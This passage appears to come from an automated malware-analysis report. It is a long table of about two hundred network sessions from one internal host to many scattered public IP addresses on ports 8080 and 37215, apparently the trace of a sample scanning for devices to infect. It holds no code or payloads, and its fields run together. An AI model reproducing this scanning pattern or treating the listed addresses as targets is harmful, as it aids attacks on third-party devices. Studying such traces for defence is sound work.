                                                        4595192.168.2.2350828196.102.252.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4596192.168.2.2354762122.86.64.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4597192.168.2.233993248.24.60.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4598192.168.2.234003848.68.212.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4599192.168.2.2346330122.244.175.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4600192.168.2.2354592102.90.133.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4601192.168.2.2336880146.2.147.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4602192.168.2.2333570116.20.95.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4603192.168.2.2342456180.161.227.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4604192.168.2.235999245.110.91.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4605192.168.2.233988064.198.249.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4606192.168.2.2346622136.176.31.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4607192.168.2.234408217.59.56.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4608192.168.2.2338798213.175.56.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4609192.168.2.2332920213.105.99.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4610192.168.2.235497863.253.84.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4611192.168.2.2337588199.112.17.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4612192.168.2.2353274174.67.65.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4613192.168.2.2353008157.204.201.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4614192.168.2.2358468136.169.174.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4615192.168.2.235237844.153.187.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4616192.168.2.234264837.123.11.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4617192.168.2.2343802192.159.220.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4618192.168.2.2360232170.159.68.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4619192.168.2.234220436.24.12.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4620192.168.2.2355512105.114.218.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4621192.168.2.2340764104.87.88.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4622192.168.2.2350274220.132.143.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4623192.168.2.2359270173.18.245.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4624192.168.2.2333794118.106.46.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4625192.168.2.2336832206.177.164.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4626192.168.2.233670854.202.243.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4627192.168.2.234341296.82.199.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4628192.168.2.2354318116.214.139.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4629192.168.2.2353778183.121.190.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4630192.168.2.234594631.41.109.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4631192.168.2.2333440198.213.87.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4632192.168.2.2348650115.75.3.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4633192.168.2.2334164160.175.226.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4634192.168.2.234139873.186.20.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4635192.168.2.233860624.19.78.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4636192.168.2.233304242.55.228.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4637192.168.2.233436461.97.14.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4638192.168.2.2351438112.225.118.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4639192.168.2.234313672.179.11.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4640192.168.2.2334336111.145.226.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4641192.168.2.235031213.161.232.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4642192.168.2.234876484.67.163.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4643192.168.2.235469862.26.97.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4644192.168.2.235749845.222.214.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4645192.168.2.233891665.27.78.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4646192.168.2.2359948200.156.153.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4647192.168.2.2336974114.155.112.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4648192.168.2.235832647.47.0.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4649192.168.2.2353230187.151.52.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4650192.168.2.2355142147.112.189.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4651192.168.2.233469624.163.166.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4652192.168.2.2346932178.36.113.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4653192.168.2.2357336175.28.66.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4654192.168.2.23446524.95.230.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4655192.168.2.234214618.87.254.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4656192.168.2.2358366150.127.219.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4657192.168.2.233960257.43.185.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4658192.168.2.235886436.113.111.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4659192.168.2.235462269.118.17.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4660192.168.2.2349950119.96.128.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4661192.168.2.2342348223.239.134.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4662192.168.2.2337986212.227.165.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4663192.168.2.234108840.38.150.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4664192.168.2.2346694138.24.43.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4665192.168.2.2336566160.131.104.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4666192.168.2.2350032154.47.15.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4667192.168.2.2350152188.147.236.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4668192.168.2.2340480147.245.250.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4669192.168.2.234901882.228.247.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4670192.168.2.235115237.213.63.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4671192.168.2.233562092.247.103.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4672192.168.2.2340058158.208.54.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4673192.168.2.23474145.20.22.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4674192.168.2.2344668190.135.224.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4675192.168.2.234715467.186.34.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4676192.168.2.234690089.197.33.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4677192.168.2.235956684.128.202.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4678192.168.2.235942818.170.228.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4679192.168.2.235975834.201.221.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4680192.168.2.2343376208.107.202.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4681192.168.2.2342476193.234.4.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4682192.168.2.234286419.94.174.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4683192.168.2.2342942141.108.107.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4684192.168.2.2338520180.71.208.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4685192.168.2.2351214190.87.26.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4686192.168.2.2342316166.126.20.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4687192.168.2.234869853.157.132.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4688192.168.2.2355228205.180.224.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4689192.168.2.235505041.195.54.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4690192.168.2.234701061.25.49.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4691192.168.2.2333324223.238.252.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4692192.168.2.235466642.206.37.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4693192.168.2.2358044156.226.173.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4694192.168.2.2360530123.16.70.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4695192.168.2.235615885.226.83.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4696192.168.2.235694081.156.140.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4697192.168.2.236097637.120.181.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4698192.168.2.233493289.40.82.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4699192.168.2.2343846101.131.22.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4700192.168.2.234087478.255.85.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4701192.168.2.235102458.237.93.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4702192.168.2.234707249.113.145.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4703192.168.2.2352730195.238.163.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4704192.168.2.234123463.234.165.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4705192.168.2.2360340194.108.97.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4706192.168.2.2337822152.215.38.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4707192.168.2.23376581.184.18.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4708192.168.2.2335970141.178.96.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4709192.168.2.234745814.251.175.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4710192.168.2.236000869.156.189.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4711192.168.2.2352028107.113.64.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4712192.168.2.235671234.40.249.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4713192.168.2.235742075.59.173.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4714192.168.2.233781414.236.1.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4715192.168.2.2351184138.197.191.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4716192.168.2.234668414.51.144.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4717192.168.2.235698483.148.227.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4718192.168.2.2355896121.150.54.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4719192.168.2.236070281.231.121.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4720192.168.2.2357272184.139.6.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4721192.168.2.235138497.104.75.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4722192.168.2.235277672.105.62.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4723192.168.2.2354494188.188.71.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4724192.168.2.234570247.57.0.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4725192.168.2.2343782196.132.3.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4726192.168.2.2354364150.248.193.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4727192.168.2.235378058.224.246.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4728192.168.2.234371297.32.245.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4729192.168.2.2333530159.25.1.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4730192.168.2.2356666154.158.240.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4731192.168.2.2335258162.8.221.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4732192.168.2.2353886195.41.208.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4733192.168.2.235907270.187.161.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4734192.168.2.2344512128.253.78.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4735192.168.2.2342690219.220.82.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4736192.168.2.233414239.193.147.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4737192.168.2.2358164207.161.221.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4738192.168.2.2344142151.67.141.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4739192.168.2.233740437.187.62.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4740192.168.2.235575020.14.199.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4741192.168.2.2349560122.240.143.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4742192.168.2.235823097.87.95.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4743192.168.2.2353554219.50.40.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4744192.168.2.2353026208.26.52.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4745192.168.2.235725886.142.218.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4746192.168.2.2359536161.206.132.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4747192.168.2.235432478.130.247.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4748192.168.2.234324025.208.88.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4749192.168.2.2334668206.217.208.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4750192.168.2.2354488185.177.249.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4751192.168.2.233876298.116.47.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4752192.168.2.2334916195.202.44.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4753192.168.2.233730641.83.148.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4754192.168.2.233520284.145.46.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4755192.168.2.234700473.58.55.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4756192.168.2.23560662.158.197.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4757192.168.2.2357748155.191.122.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4758192.168.2.2345702163.41.10.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4759192.168.2.2345168188.86.96.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4760192.168.2.2352152167.68.53.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4761192.168.2.2342060132.252.5.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4762192.168.2.233525851.103.27.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4763192.168.2.2345900181.248.53.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4764192.168.2.233736854.218.183.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4765192.168.2.2339788218.41.124.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4766192.168.2.235171899.236.120.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4767192.168.2.2360222115.206.100.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4768192.168.2.2339974220.234.130.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4769192.168.2.234441868.14.79.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4770192.168.2.234206041.139.135.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4771192.168.2.235743441.119.58.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4772192.168.2.234634254.202.242.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4773192.168.2.235944293.15.70.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4774192.168.2.235051041.179.68.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4775192.168.2.2351154197.125.168.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4776192.168.2.2334154197.126.108.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4777192.168.2.2342064197.142.233.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4778192.168.2.23458828.201.152.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4779192.168.2.2354156157.64.10.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4780192.168.2.233849881.204.181.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4781192.168.2.2346618197.127.165.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4782192.168.2.233907075.103.208.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4783192.168.2.2338990197.126.252.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4784192.168.2.2336050204.85.57.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4785192.168.2.235407641.247.242.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4786192.168.2.2354574157.232.121.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4787192.168.2.2349630197.80.211.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4788192.168.2.2341960157.251.3.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4789192.168.2.234436491.30.3.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4790192.168.2.2341564157.19.220.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4791192.168.2.2355144197.1.149.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4792192.168.2.2333930197.254.157.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4793192.168.2.2333104185.245.249.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4794192.168.2.2357686197.151.27.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4795192.168.2.233750241.112.13.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4796192.168.2.235330041.248.132.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4797192.168.2.236035241.11.201.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4798192.168.2.2337162197.207.70.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4799192.168.2.235645841.95.46.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4800192.168.2.2360610157.166.82.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4801192.168.2.2352022197.53.135.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4802192.168.2.2333690197.222.135.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4803192.168.2.2347598197.202.134.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4804192.168.2.234433650.34.72.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4805192.168.2.2341066197.52.95.23937215
                                                        TimestampBytes transferredDirectionData


